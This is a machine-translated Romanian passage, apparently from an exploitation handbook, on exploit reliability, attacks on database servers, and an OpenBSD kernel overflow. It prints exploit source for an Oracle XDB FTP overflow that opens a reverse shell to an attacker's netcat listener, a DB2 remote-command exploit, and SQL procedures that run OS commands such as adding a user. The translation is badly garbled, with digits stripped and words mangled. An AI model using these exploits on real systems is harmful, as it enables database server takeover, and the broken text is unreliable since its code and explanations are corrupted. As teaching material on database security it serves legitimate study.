lumea Mai mult și Mai mult dificil vulnerabilități este singura cale dezvoltare nou metode Cât costă ar tu pi citit despre volum sau in caz contrar recepţie, tu nu nu învăța într-adevăr a lui aplica procedură din acest, ar trebui să mereu aplica adiţional eforturi la la asta la ta solutii a lucrat Cum poate sa mai sigur Uneori decizie în mod constant lucru în laboratoare, pe numai pa % lucru în real conditii; apoi, la a ridica fiabilitate, a lui de multe ori cont pentru rescrie din nou Poate a se dovedi ce primul versiune cod, scris pentru specific vulnerabilități lucram numai pe ta calculator De obicei aceasta este vorbi! despre volum, ce în cod au fost greu codificat niste important valorile (mai repede Total, adresa întoarcere sau adresa geteip) Când pare posibilitate a inlocui Factori lipsa de încredere indicator pe funcţie sau salvat adresa întoarcere, Control necesar Unde- apoi transfer către Specific adresa transmitere poate depinde din mulți factori numai parte din care este sub ta Control LA context dat capitole noi Hai sa sunăm asemănătoare situatie un singur factor exploata (ope-lactor exploata) La fel în cod poate avea loc, pe la care este indicator pe linia ţintă program utilizări acest indicator față subiecte Cum tu lua a ei sub puroi Control Pentru prevenirea eșecuri acest indicator (parte atacând Cu i stâncos) necesar instalare pe niste sigur loc în memorie Acest Etapa creează al doilea factor, necesar pentru de succes exploatare vulnerabilități majoritate simplu exploatează sunt unu- și cu doi factori De exemplu, exploata, realizând protozoare la distanta revărsare grămadă, de obicei este un singur factor tu trebuie sa numai dreapta cere adresa implementate cod în memorie Dar Cu tranziție la exploatații, fondat pe revărsare grămezi, care de obicei sunt cu doi factori, cont pentru căutare cale la scădea grad haos în sistem Versiuni La exploatare vulnerabilități în real conditii apare unu important problemă: tu departe nu mereu tu stii ce fel programe muncă pe atacat calculator Poate, aceasta este va fi un calculator Cu Windows Avansat Server, Cum în ta laboratoare; A poate a fi, pe limba germana lucru fuziune la rece și se întâmplă permanent deplasare în memorie Este interzis exclude și A merge, ce pa limba germana instalat versiune Windows pentru simplificat chinez scrisori Pe calculator Mai a fi instalat orice actualizări pâna la inainte de cele mai recente versiuni Serviciu Rusk; poate a se dovedi ce niste din lor stabilit manual, în plus, Poate, incorect DIN un alt mână, la distanta gazdă poate muncă sub management linux pentru platforme Alfa sau avea Arhitectura SMP Mulți publicat vulnerabilități Microsoft RPC localizator nu muncă pe calculatoare Arhitecturi SMP și în sisteme Cu procesor Cheop, care Windows gandeste procesor dublu Astfel de Probleme foarte greu rezolva în la distanta modul Cu exceptia A merge, la exploatare vulnerabilitati, fondat pe deteriora grămezi, apărea Probleme, nu permițând alții bucură-te atacat serviciu Mai mult unu uzual problemă revărsare grămezi este în volum, ce înlocuibil indicatoare pe funcții depinde din specific versiuni libc Asa de Cum în diferit versiuni linux sunt utilizate diferit versiuni libc, aceasta este mijloace ce decizie trebuie sa a fi legat la specific trusa de distributie linux La din pacate nici unu trusa de distributie nu cucerit dominant prevederi, asa de greu codifica aceste valorile nu Asa de pur şi simplu, Cum în caz Cu Windows sau comercial versiuni Unix tine minte, ce mulți furnizori eliberare diferit versiuni Unix Cu aceeași numere versiuni Ta versiune Solaris CD poate diferă din un alt Capitol optsprezece Real termeni, real Probleme versiuni Solaris CD, dacă ei dobândit în Alte timp LA ta versiuni Mai a fi instalat petice, dispărut în un alt versiune, și viceversa Probleme Cu implementate cod niste programatori petrece întreg săptămâni pe scris proprii in afara* ponosit cod Alte utilizare pachete din Furtuna de pachete (http://packetstormt org) Dar ce ar viclean nici a fost ta implementate Codul, el Toata lumea egală osta* etsya program, scris pe asamblator și efectuat în instabil mediu inconjurator aceasta mijloace ce cauze eșecuri de multe ori sunt ascunse în se implementate cod LA laboratoare atacând și atacat calculatoare conectat la singur! concentrator ethernet Dar în real conditii poartă poate fi pe #include # include int GainControlOfOracle(char *, char *), int StartWinsock(void) int SetUpExploit(char *,int) struct sockaddr n s sa, struct gazdă *el, nesemnat int adresa, char gazdă[ ]="", nesemnat char explora[ ]= „\x \x B\xEC\xEB\xO \x B\xEB\xO \xE \xF \xFF\xFF\xFF\xBE\xFF\xFF” „\xEE\xEE\x \xE \xOS\xEE\xEE\xEE\x \xOE\x \xC \x \x \x \x ” ,,\x \x \x \x \x \x \xFF\xD \x \x \x \x \x \x \x \x C" „\x \x \x \x \x C\x F\x \x \x \xFF\x \xFC\xFF\x \xF \x ” „\x \xF \x \xC \x \x \xC \x D\x \xC \xBl\x E\xB \xFF\x \xl ” „\x \xEB\x \xE \xF \x \x \xFF\x \xFC\xFF\x \xF \x \x \xEC” „\x \xC \xl \x \xFF\x \xFC\xFF\x \xF \x \x \xE \x \xC \x C” „\x \xFF\x \xF \x \x \xF \x \xC \x C\x \x \xFF\x \xF \x ,” „\x \xE \x \xC \x C\x \xFF\x \xF \xFF\x \xF \x \x \xE \x ” „\xC \x C\x \xFF\x \xF \xFF\x \xF \x \x \xDC\x \xC \x \x ” „\x D\xD \x \xD \x \x \xC \x \x \x \xFF\x \xE \x \xC \x M ,,\xC \x \xB \x \x \x \xE \xFD\x \x \xD \x \x \xD \xBF\x A" ,,\x \x \x \x \x D\xCC\x \x \x \x \xC \x \xB \xFF\xFF\x " „\x \xFF\xCA\x \x \x \xCA\x A\x \x A\x \xFF\x \xE \x \x ” „\xE \x A\xl \x D\x \xC \x \x B\x D\xE \x \xFF\x \xDC\x \xC ” „\x \x \x \x \xFF\xFF\xFF\x \xC \x E\x \xC \x E\x \x \x ” ,,\x \x D\x \x \x D\x \x \x D\x \x D\xBD\x \xFF\xFF\xFF\x '' „'\x D\xBD\x \xFF\xFF\xFF\x \x \xC \x \x \x \x \xC \x \x ” „\x \xE \x \x \x \x B\x D\xD \x \x \xFF\x \xEC\xFF\x \xE ” „\x \x \xD \x \xC \x \x \x B\x \x B\x \x C\x B\x \xlC\xAD” „\x B\x \x \x \x B\xC \x B\xF \x B\xDA\x B\xCA\x \x \x C\x ” Capitol nouăsprezece atacuri pe SGBD „\x \x \xO \x \xlC\x \x A\xlF\x \x \xO \x \xO \x \xO \x ” „\x \x A\x \x B\xFA\xO \x E\x \x F\x \x \x \x O\x \xO \x ” „\xC \xO \x \xCl\xO \xEB\xEC\x \xC \xO \x \x F\x \x F\x \x ” „\x \xO \x \xC \xO \x \xCl\xO \xEB\xD \x B\xFA\xOF\xB \xOl\xO ” „\x C\x \x \x C\x \x \x B\x C\x \x \x C\x \x C\x F\x \xC ” „\x \x \x \xBC\x D\x A\x E\x B\x A\xAF\x D\x \x C\x A\x C\x C” „\xBE\xFF\xFF\xBA\x \x \x B\xAB\x \x D\x A\x E\x B\xFF\xFF\xA ” „\x C\xCD\xA \xCC\xCD\xDl\x B\x \x \xFF\xFF\xA \xAC\xBE\xAC\x B” „\x E\x D\x B\x A\x F\xFF\xFF\xA \xAC\xBE\xAC\x \x C\x \x A\x B” „\xBE\xFF\xFF\x C\x \x \x \x A\x C\x B\xFF\x C\x \x B\xFF\xFF'' „\xFF\xFF\xFF\xFF” char exploit codeL ]= „DEBLOCARE / aaaabbbbccccddddeeeeffffgggghhhhiii jjjjkkkkl Immmmnnn" „nooooppppqqqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAAABBBBCCCCD” „DDDEEEEFFFFFGGGGHHHHIIIIJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSST” „TTTUUUUVVVVWWWXXXXYYYYZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK” „LMNOPQRSTUVWXYZ ” "laaaabbbcc"; char exception handler[ ]="\x \x B\xf \x "; char short jumpE ]="\xEB\x \x \x ": int principal (int argc char *argv[]) { dacă (argc != ) printf("\n\n\tOracle XDB FTP Serviciu DEBLOCARE Tampon revărsare Exploata"): printf("\n\t\tpentru pălărie neagră (http //www pălărie neagră com)"): printf("\n\n\tApare A verso coajă la specificat port"), printf("\n\n\tUtilizare \Ne gazdă numele de utilizator parola adresa IP port",argv[ ]); printf("\n\n\tDavid L tchfield\n\t(david@ngssoftware com) printf("\n\t -a iulie \n\n\n"): întoarcere : } strncpy(host argv[l] ) if(StartWinsock()== ) întoarcere printfC'Errore pornire WinsockAn"): SetUpExploit(argv[ ] atol(argv[ ])): streat(exploit code short j ump) streat(exploit code exception handler) strcat(exploit code exploit), strcat(cod exploatare "\r\n") GainControl f racle(argv[ ],argv[ ]) întoarcere } int SetUpExploit(char *IP-ul meu, int portul meu) atacuri reţea nivel nesemnat int p= , nesemnat mic de statura prt= char *ipt=n” char *prtt="": ip = inet addr(myip) ipt = (car*)&ip: exploit[ ]=ipt[ ] exploata[ ]=ipt[l]; exploit[ ]=ipt[ ], exploit[ ]=ipt[ ], // Numi portul tcp pentru conexiuni // Program netcat trebuie sa conduce ascultare pe acest port // De exemplu, nc - -R prt = htons((nesemnat scurt)myport): prt = prt OxFFFF, prtt = (car *) &prt, exploit[ ]=prtt[ ], exploit[ ]=prtt[l] întoarcere int StartWinsocU) { int eroare= CUVÂNT wVersionRequested WSADATA wsaData wVersionRequested = MAKEWORD( ) a greșit = WSASstartup( wVersionRequested &wsaData ), dacă ( a greșit l= ) întoarcere dacă (LOBYTE( wsaData wVersiune ) l= || HIBYTE( wsaData wVersiune ) l= ) WSACleanup( ) întoarcere : dacă (isalpha(gazdă[ ])) el = gethostbyname(gazdă) s sa sin addr s addr=INADDR ANY s sa sin family=AF INET, memcpy(&s sa sin addr he->h addr,he->h length) altfel { adresă = inet addr(gazdă) s sa sin addr s addr=INADDR ANY s sa sin family=AF INET memcpy(&s sa sin addr,&addr ) el = (struct gazdă *) Capitol nouăsprezece atacuri pe SGBD dacă (el == nul) întoarcere întoarcere ; } int GainControlOfOracle(char *utilizator, char *trece) { char usercmd[ ]="utilizator "; char passcmd[ ]="trece char resp[ ]="": int snd= ,rcv= , struct sockaddr in adresa r; PRIZĂ ciorap: strncat(usercmd,user, ), strcat(usercmd,"\r\n"), strncat(passcmd,pass, ): strcat(passcmd, „\r\n”) sock=socket(AF INET,SOCK STREAM, ): dacă (sock==INVALID SOCKET) întoarcere printf(" ciorap eroare"): r addr si n family=AF INET, r addr sin addr s addr=INADDR ANY, r addr sin port=htons((nesemnat scurt) ), s sa sin port=htons((nesemnat scurt) ), dacă (connect(sock,(LPSOCKADDR)&s sa,sizeof(s sa))==SOCKET ERROR) întoarcere printf("Conectează-te eroare"): rcv = recv(sock,resp, ), printfCls" resp): ZeroMemory(resp, ), snd=trimite(sock cmd utilizator strlen(usercmd) , ), rcv = recv(sock,resp, , ), printf( 'ls", resp) ZeroMemory(resp, ), snd=trimite(ciorap, passcmd , strlen(passcmd) , ), rcv = recv(sock,resp, , ), printfds" resp), if(resp[ ]==' ') closesocket(soc) întoarcere printf("Eșuat la Buturuga în folosind utilizator %s și parola £s \n",utilizator,trecere): } ZeroMemory(resp, ), snd=trimite(ciorap, exploata codul, strlen(cod exploatare) ), atacuri reţea nivel somn ( ) closesocket(soc); întoarcere ; Revărsare XDB pentru linux: #include #include #include #include #include #include int principal (int argc, char *argv[]) struct gazdă *el, struct sockaddr in sa; int ciorap; nesemnat int adresă = ; char recvbuffer[ ]="", char utilizator[ ]="utilizator ", char passwd[ ]="trece "; int rcv= , int snd = ; int numara = nesemnat char nop sled[ ]="", nesemnat char saved return address[]=,,\x \xc \xff\xbf"; nesemnat char exploit[ ]="deblocare / AAAABBBBCCCCDDDDEE" „EEFFFFGGGGHHHHIIIIJJJJKKKK” „LLLLMMMMNNNNOOOOPPPPQQQ” "qrrrrssssttttuuuuvvvvwww" „WXXXXYYYYZZZZaaaabbbbccccdd”; nesemnat char cod[]= „\x \xdb\x \x \x \x \x \x b\x a\x \x \x \x \xcd” „\x \x \x b\x \x \x \x \x \x \x \x \x \x \x ” „\x \x \x a\xl \x \x \x \x \x a\x \x \xcd\x \x ” „\x a\x \x \x \x \x a\x \x \x \x \xcd\x \x \x ” „\xec\xl \x \x a\x \x \x \x \x \x a\x \x \x \xcd” „\x \x \x \xc \x b\x a\x f\x \xcd\x \x \x a\x f\x ” „\xcd\x \x \x a\x f\x \xcd\x \x a\x b\x \x \x \x ” „\x e\x f\x \x \x \x f\x f\x \x \x \x b\x \x \x ” „\x \xcd\x \r\n”, dacă (argc l= ) { printf("\n\n\tOracle XDB FTP Serviciu DEBLOCARE Tampon revărsare Exploata") printf("\n\t\tpentru pălărie neagră (http //www pălărie neagră porumb)"), printf("\n\n\tApare A coajă ascultând pe TCP port "); printf("\n\n\tUtilizare \t%s gazdă numele de utilizator parola",argv[ ]), printf("\n\n\tDavid Litchfield\n\t(david@ngssoftware porumb)"); Capitol nouăsprezece atacuri pe SGBD printf("\n\t iulie \n\n\n") întoarcere } în timp ce (număr h addr he->h length) } ciorap = priză (AF INET SOCK STREAM O) dacă (ciorap ) printf(' s\n" recvbuffer), atacuri reţea nivel bzero(recvbuffer,rv+ ), el se închide (șosetă); întoarcere prlntfCProblem cu recv()\n"), // Trimiterea comenzi utilizator snd = trimite(sock user,strlen(user), ), f(snd != strlen(utilizator)) { aproape (ciorap) întoarcere prlntfCProblem cu trimiteO un"); el se { printf("Xs'' utilizator), } // Chitanță raspuns Codul raspuns ar trebui să a fi egală rcv = recv(sock,recvbuffer, , ), dacă(rcv > ) f(recvbuffer[ ]== x && recvbuffer[l]== x && recvbuffer[ ]== x ) { printf("%s\n" recvbuffer), bzero(recvbuffer,rcv+ ) } altfel { inchide (ciorap), întoarcere printf("FTP raspuns cod a fost nu \n") } } altfel { inchide (ciorap), întoarcere prlntfCProblem cu recv()\n"), } // Trimiterea comenzi trece snd = trimite(sock,passwd,strlen(passwd), ), dacă (snd l= strlen(utilizator)) { inchide (ciorap), întoarcere prlntfCProblem cu trimiteO \n"), } altfel prlntfds" passwd), // Chitanță raspuns Dacă Răspuns excelent din , / atentat, încercare Intrare încheiat eșec rcv = recv(sock,recvbuffer, , ), dacă(rcv > ) Capitol nouăsprezece atacuri pe SGBD f(recvbuffer[ ]== x && recvbuffer[l]== x && recvbuffer[ ]== x ) { pn ntf ("%s\n", recvbuffer) bzero(recvbuffer,rcv+l), } altfel inchide (ciorap), întoarcere prlntfC'FTP raspuns cod a fost nu Autentificare a eșuat \n"): } } altfel inchidere(ciorap): întoarcere printf("Problema cu recv()\n"); // Trimiterea comenzi DEBLOCARE Cu implementate cod snd = trimite(sock exploit strlen(exploit) ); dacă (snd != strlen (exploda)) închide (șosetă); întoarcere printfC'Problemă cu trimiteO \n"): } // Trebuie sa a primi semn greșeli rcv = recv(sock recvbuffer ) dacă(rcv > ) printf('ls\n" recvbuffer) printf("\n\nExploare cod trimis ,\n\nAcum telnet la %s \n\n" argv[l]) aproape (ciorap) întoarcere Dacă Oracol prevede serviciu acces la baza date prin NTTR și ftp, DB promoții acces la JDBC applet Server prin port TCP Astfel de posibilitate exista pentru A merge, la clienți web ar putea Descarca și a executa în a lui browser applet Java pentru cerere la baza date in orice caz aceasta este asociate Cu evident risc legate de Cu sosit din client cereri Acea, ce Anchetă poate a fi greu codificat în applet, nimic nu mijloace — atac poate pur şi simplu redirecţiona A mea Anchetă JDBC applet Server transmite Anchetă Server bazele date, A rezultate se întorc client Nu cheltuieli și vorbi, ce acest funcţie extrem periculos A la a ei utilizare Necesar prudență La fel de cunoscut în an la Microsoft apărea Probleme Cu vierme Slammer Slammer folosit revărsare tampon în grămadă, la care pe port transmise Pachetul UDP Cu primul octet x , pe care urmat foarte lung linia De acest despre a fost scris destul de putine articole; la dorință tu uşor găsi informație în Internet performanţă comenzi insratskyippigi unuivniu atacuri aplicat nivel atacuri aplicat nivel acțiune pe Două categorii LA atacuri primul categorii funcții servere sunt utilizate pentru împlinire comenzi sala de operatie sisteme, A în atacuri al doilea categorii performanţă funcții servere organizat prin revărsare tampon LA orice caz Codul exploatare vulnerabilități ortografiat pe SQL (sau T-SQL, sau PL/SQL) și poate să fie efectuate în standard client program SQL Luand in considerare acea fapt, ce limba SQL și a lui extensii sunt echivalente limba programare, atac poate sa ascunde special codificare Ţintă program foarte greu apără-te din atacuri asemănătoare drăguț și chiar pur şi simplu descoperi lor, dacă analiză În curs de desfășurare numai pa aplicat nivel Sisteme detectare invazii (Intruziune detectare sisteme, IDS) și chiar sisteme prevenirea invazii (Intruziune Prevenirea sisteme, IPS) nu înștiințare ce merge mai departe ceva nepotrivit Considera simplu exemplu: față direct deținere atacuri implementate Codul, care poate a fi criptat, plasat în masa Apoi Următorul Anchetă (Poate, efectuat prin niste săptămâni) produce prelevarea de probe cod în variabil și execută a ei echipă EXEC Primul Anchetă: INTRODUCE ÎN TABLEI (de asemenea) VALORI ('EXPLOATA') Al doilea Anchetă: DECLARA @bar varchar( ) SELECTAȚI @bar = de asemenea DIN TABLEI EXEC (@bar) oricine va spune ce astfel de atacuri poate sa recunoaşte pe dinamic apel EXES Poate sa, cu siguranță, dar asemănătoare cereri nu ieși pe cadru normal muncă, și distinge astfel de atac din comun cerere imposibil Pe cel moment, la asigura Securitate servere bazele date mai bine nu se bazează pe sisteme IPS/IDS, A a cheltui timp pe temeinic blocare Server Performanţă comenzi sala de operatie sisteme La disponibilitate potrivit privilegii (A ochi de multe ori și fără lor) mulți relaționale SGBD permite utilizator îndeplini comenzi sala de operatie sisteme De ce permite asemănătoare lucruri? motive poate a fi mulți (de exemplu, Cum afișate Mai departe, acest funcţie de multe ori Necesar pentru instalatii actualizări sisteme Securitate Microsoft SQL Server), dar, pe al nostru opinie părăsi asemănătoare lacune prea mult periculos O abordare la implementare comenzi sala de operatie sisteme prin SGBD depinde din producător programe Microsoft SQL Server Chiar dacă tu tu stii despre Microsoft SQL Server nu Asa de deja mulți, probabil, tu auzit despre extins stocate procedură xp cmdshellL De obicei performanţă Capitol nouăsprezece atacuri pe SGBD xp cmdshell permis numai utilizatorii Cu privilegii sistemică administrator, dar pe Recent ani au fost descoperit niste vulnerabil, permițând îndeplini a ei neprivilegiat utilizator Procedură xp cmdshell primeste unu parametru — efectuate comanda Comanda de obicei efectuat în context Securitate contabilitate înregistrări, Cu drepturi care lucru SQL Server; de multe ori aceasta este Total numai contabilitate intrare LOCAL SISTEM LA niste cazuri creată intermediar contabilitate record, și comanda efectuat în context Securitate acest contabilitate înregistrări: ex maestru xp cmdshell ('dir > c \foo txt') Cu toate că posibilitate apel xp cmdshell în trecut de multe ori LED la încălcare sisteme Securitate SQL Server, procedură folosit mulți actualizări Pentru asigura Securitate recomandat șterge acest extins stocate procedură și mutare fişier xplog dll din catalog bipp Când o sa ai nevoie aplica Actualizați sisteme Securitate, întoarcere xplog dll în catalog bipp și adăuga xp cmdshell din nou Oracol Exista Două cale împlinire comenzi sala de operatie sisteme mijloace oracol, cu toate că nici unu din lor nu exista în gata formă — Sunt numai sunt comune recomandări pe lor aplicarea Primul cale bazat pa utilizare stocate proceduri PL/SQL Limba PL/SQL se extinde asa de modul în care la procedură ar putea apel functii, exportate biblioteci sala de operatie sisteme aceasta permite atacator Descarca DIN- bibliotecă timp performanţă (msvcrt dll sau IIbc) și a executa sistemică Funcția C sistem() cauzat funcţie execută echipă, Cum afișate în Următorul listare: CREA SAU A INLOCUI BIBLIOTECĂ exec shell LA FEL DE „C:\winnt\system \msvcrt dll'; / spectacol erori CREA SAU A INLOCUI PACHET oracmd ESTE PROCEDURĂ exec (cmdstring ÎN CHAR): Sfârşit oracmd / spectacol erori CREA SAU A INLOCUI PACHET CORP oracmd ESTE PROCEDURĂ exec(cmdstring ÎN CHAR) ESTE EXTERN NUME "sistem" BIBLIOTECĂ exec shell LIMBA C Sfârşit oracmd / exec oracmd exec ('net utilizator ngssoftware parola ! /adăuga') Pentru creare astfel de proceduri personalizat contabilitate intrare trebuie sa avea privilegiu CREATE/ALTERAȚI (orice) BIBLIOTECĂ LA Recent versiuni Oracol posibilitate descărcări biblioteci limitat catalog ${ORACLE HOME}\bin Tem ns Mai puțin, atac "dubla puncte" permite izbucni din acest catalog și Descarca arbitrar bibliotecă: CREA SAU A INLOCUI BIBLIOTECĂ exec shell LA FEL DE ' \ \ \ \ \winnt\system \msvcrt dl G, Performanţă comenzi sala de operatie sisteme Nu cheltuieli și vorbi, ce la implementare atacuri în Unix necesar conduce Nume biblioteci în conformitate Cu prin libc Apropo zicală niste versiuni Oracol poate sa a fost înşela și forta lor îndeplini comenzi sala de operatie sisteme, chiar nu atingere la principal Servicii SGBD La Se încarcă biblioteci Oracol conectează la modul TNS ascultător, A ultimul execută mic program extproc, care și efectueaza imediat Se încarcă biblioteci și apel funcții Prin conectare direct la TNS ascultător, poate sa forta a lui a executa extproc Asa de modul în care atac fără identificator utilizator și parola ar putea lua Server Oracol sub deplin Control Defect a fost fix IBM DB SGBD IBM DB aminteste oracol, și în băutură la fel prezent defecte, dar niste alții La fel de și oracol, DB permite crea procedură pentru împlinire comenzi sala de operatie sisteme, dar pe Mod implicit astfel de posibilitate furnizate oricine utilizator La instalare DB utilizator PUBLIC pe Mod implicit numit privilegiu IMPLICIT SCHEMA, permițând crea nou sistem Proprietar scheme este sistem, dar PUBLIC furnizate drepturile pa creare obiecte în acest sistem LA rezultat neprivilegiat utilizator poate crea nou sistem și defini în a ei procedură: CREA PROCEDURĂ rootdb (ÎN cmd varchar( )) EXTERN NUME 'c \winnt\system \mscvrt system' LIMBA C DETERMINAT PARAMETRU STIL DB SQL caii rootdb ('dlr > c \db txt') La neprivilegiat utilizatorii nu ar putea conduce asemănătoare atacuri, urmă pe subiecte la utilizator PUBLIC a fost lipsit privilegiu IMPLICIT SCHEMĂ LA DB la fel exista un alt (fără aplicatii SQL) mecanism împlinire comenzi sala de operatie sisteme Pentru simplificare administrare disponibil procedură pentru servere Rcmote comanda Server, destinat, Cum ar trebui să din a ei nume, pentru la distanta împlinire comenzi Pe platformă Windows acest Server db rcmd exe suporturi deschis numit canal DB REMOTECMD; la distanta clientii Mai conectați la -l transmite comenzi și a primi rezultate Față trimitere comenzi primul operațiuni înregistrări produce acord, A se comanda transmise al doilea Operațiune înregistrări La primind aceste Două operațiuni începe separa proces db rcdmc exe care răspunsuri pe performanţă comenzi Server începe și lucru în context Securitate contabilitate înregistrări db admin, care pe Mod implicit numit administrativ privilegiu După împlinire db rcdmc și comenzi aceste privilegiu ns sunt pierdute Pentru conexiuni la canal DB REMOTECMD client o sa ai nevoie identificator utilizator și parola, pe la lor disponibilitate chiar neprivilegiat utilizator va fi capabil îndeplini comenzi Cu administrativ drepturi Nu cheltuieli și vorbi, ce amenințare Capitol nouăsprezece atacuri pe SGBD pentru Securitate creează astfel de posibilitate La fel de minim IBM ar trebui să ar Schimbare Codul servere la distanta comanda Server Asa de, la față implementare numit funcţie ImpersonateNamedPipeClient LA acest caz comanda efectuate ar Cu privilegii utilizator, din pe cine a intrat Anchetă La fel de maxim ar trebui să ar proteja numit canal și permite recurs la serviciu numai utilizatori, posedând administrativ privilegii Următorul program execută comanda pe la distanta Server și se intoarce rezultate: # include #include int principal (int argc, char *argv[]) ^char buffer[ ]="" char NamedP pe[ ]="\\\\"; MÂNER rcmd=NULL, char *ptr = NUL: int len = : DWORD octeți = ; f(argc != ) { printf("\n\tDB la distanta comanda Exploat \n\n"); printf("\tUtilizare- db rmtcmd ţintă \"comandă\"\n"); printf("\n\tDavid Litchfield\n\t( davIdQngssoftware com)\n\t -a Septembrie \n"); întoarcere strncat(NamedP pe argv[l], ), strcat(NamedPIpe,"\\pi pe\\DB REM TECMD"); // Mesaj pentru armonizare ZeroMemory(buffer, ); buffer[ ]= x , ptr = &buffer[ ]: strcpy(ptr,"DB "), len = strlen(argv[ ]), buffer[ ]=(car) len; // Deschidere numit canal rcmd = CreateFile(NamedP pe,GENERIC WRITE|GENERIC READ, NULL OPEN- EXISTING, ,NULL), f(rcmd == INVALID HANDLE VALUE) întoarcere printfC'Eșuat la deschis teava %s eroare %d \n" NamedPIpe GetLastError()); // Trimiterea armonizare len = WriteFile(rcmd,buffer, &Bytes,NULL) dacă(! en) întoarcere printfC'Eșuat la scrie la %s eroare %d \n" NamedP pe GetLastError()), atacuri pe nivel SQL ZeroMemory(buffer, ); strncpy(buffer,argvL ], ) // Trimiterea comenzi len = Wr teFile(rcmd,buffer,strlen(buffer),&Bytes,NULL); daca(llen) întoarcere printf("Eșuat la wrlte la ^s eroare M\n",NamedPipe,GetLastError()); // Citind rezultate in timp ce(len) { len = ReadFile(rcmd,buffer, ,&Bytes,NULL): printf('ls",buffer); ZeroMemory(buffer, ): întoarcere , } Permite la distanta performanţă comenzi nesigur asa de acest funcţie ar trebui să pe oportunități dezactivați Noi depus rând moduri împlinire comenzi sala de operatie sisteme Cu folosind relaționale SGBD Desigur, exista și alte metode Noi recomanda temeinic a analiza ta software Securitate, dezvălui a lui puncte slabe și asumă actiuni pentru prevenirea posibil atacuri atacuri pe nivel SQL Utilizare defecte pe nivel SQL mai simplu, Cum pe Mai mult scăzut niveluri In orice caz, aceasta este nu mijloace ce nivel scăzut defecte conjugat Cu special complexități — complicaţie se dovedește deloc mic Muncă pe nivel SQL mai simplu cu toate că ar deoarece, ce noi Poate sa se angajează client instrumente (astfel de Cum Microsoft Interogare Analizor și Oracol SQL*Plus) pentru încapsulare cerere Cu Ajutor astfel de protocoale înalt nivel, Cum TDS și TNS Rămășițe numai scrie Codul atacuri pe relevante expansiune SQL Funcții SQL Majoritate vulnerabilități revărsare pa nivel SQL exista în funcții și extins stocate proceduri LA cel mai subsistem sintactic analizare limba SQL vulnerabilități sunt găsite extrem rar In orice caz, aceasta este logic — din mecanism analizare necesar maxim fiabilitate și pricepere face față Cu nenumărat soiuri cereri; Codul ar trebui să a fi liber din erori DIN un alt mână, funcții și stocate proceduri de obicei creată pentru solutii unul sau doi de specialitate sarcini; lor Codul mai rar expuse temeinic studiu Capitol nouăsprezece atacuri pe SGBD Mare parte coduri, de obicei folosit la exploatare vulnerabilitati, ne se aplică la codificare ASCII; pe acest motiv ne o sa ai nevoie metodă transmitere tipărite caractere ASCII pe canal Pe primul vedere o sarcină pare complicat dar aceasta este nu asa de La fel de menționat anterior, număr implementate Opțiuni revărsare pe nivel SQL nemărginit — extensii SQL oferi puternic miercuri programare Considera niste exemple Utilizare funcții CHR sau CHAR LA cel mai implementari SQL prezent funcţie CHR sau CHAR, care primeste număr și se transformă a lui în simbol DIN a ei Ajutor poate a fi primit performant Codul Sa spunem noi vrei la Codul efectuat comanda caii eax; în binar supunere acest comanda codificat octeți OxFF și x Codul Microsoft SQL va fi să arate ca Asa de: DECLARA @foo varchar( ) SELECTAȚI @foo = CHARC ) + CHAR( ) LA Oracol folosit funcţie CHR() Uneori a reusi treci bine chiar fără funcții CHR și CHAR Poate sa pur şi simplu transfer către octeți în hexazecimal formă: SELECTAȚI @foo = OxFFDO Lesne de înțeles, ce la utilizare asemănătoare metode nu va fi Probleme Cu transfer binar cod LA calitate exemplu considera Următorul Codul T- SQL, realizând revărsare tampon în grămadă Microsoft SQL Server Simplu revărsare tampon în OpenDataSource() Spectacole Cum utilizare revărsare în Unicode Cu T-SQL apeluri CreateFI e() pentru creare fişier Cu \sql-odsjet-bo salvat adresa întoarcere este înlocuit sens Ox BOC DC Lucru în SQL SP și SP Adresa conţine comanda jmp esp Pentru remedieri defect ar trebui să Descarca ultimul lucru Actualizați Avion Serviciu Rusk din Microsoft - http-//www microsoft fagure/ David Lichfield (david@ngssoftware fagure) nouăsprezece iunie G declara Oexplolt nvarchar( ) declara Opaddlng nvarchar( ) declara @saved return address nvarchar( ) declara @cod nvarchar(lOOO) declara @pad nvarchar( ) declara @cnt int declara @more pad nvarchar(lOO) Selectați @cnt = Selectați Qpadding = x Selectați @pad = x in timp ce @cnt p->p fd->fd nfi ies) { SCARG(uap, nd) = p->p fd->fd nfi Da [ ] ni = câți(SCARG(uap,nd), NFDBITS) ★ sizeof(fdjnask) [ ] dacă (SCARG(uap nd) > FD SETSIZE) { [îndepărtat] #defwe getbits(nume, X) [patru] dacă (SCARGtuap, Nume) && (eroare = copyin((caddr t)SCARG(uap Nume) (caddr t)pibits[x] nu))) mergi la Terminat, [cinci] getbitsCin, ) getbits(tu, ) getbits (ex, ); Capitol Psrocompletare în miez #undef getbits [îndepărtat] La a intelege sens cod, necesar extrage macro SCARGA din antet fișiere sys/systemh #dacă BYTE ORDER == BIGJNDIAN #defini scargtp, k) ((p)->k fi date) /* A primi argument pe index */ #el f BYTE ORDER == LITTLEJNDIAN #defini SCARG(p, k) ((p)->k le date) /* A primi argument pe index */ sys/syscal arg h: linia paisprezece #defini syscallarg(x) uniune { register t tampon; struct { X date, } le, struct { nt t pad[ (slzeof (register t) p fd->fd nfites (număr deschis descriptori Deținut proces) Acest verificări insuficient Parametru nd a anunţat Cum simbolic Tipuri vulnerabilități nuclee ([ ]), asa de în limba germana poate fi transmis negativ sens LA acest caz examinare "Mai mult Cum" ([ ]) ignorat Mai tarziu nd folosit macro cat de mult() ([ ]) pentru calculele argument lungime pі operațiuni sursă: #defini câți (x, y) (((x)+((y)- ))/(y)) ni = ((nd + (NFDBITS-D) / NFDBITS) * sizeof(fd mask): ni = ((nd + ( = )) / ) * patru Pe calcul ni ar trebui să un alt examinare argument nd ([ ]) Acest examinare la fel se termină în siguranță, deoarece ce dezvoltatori OpenBSD în mod constant a uita despre semn la verificare argument n d Examinare [ ] determină suficient dacă dedicat în grămadă memorie pentru operațiuni coreip; dacă memorie insuficient bloc necesar mărimea iese în evidență în morman din cauza uitat semn noi trecem verificare [ ] și continua utilizare grămadă LA linii [ , ] macro getbits() determinat și numit pentru primind personalizat date fd set (readfds, scriefds, cu excepția fds — aceste matrice conține descriptori, verificabil pe pregătire pentru citind, pregătire pentru înregistrări sau Disponibilitate brut excepţional state) Desigur dacă argument nd vor fi transmise în formă negativ întregul numere, Operațiune componentă (în getbits) rescrie părți memorie miez, ce la utilizare niste trucuri, orientat pe revărsare miez, poate conduce la implementare străin cod Dacă uni Toata lumea spus, 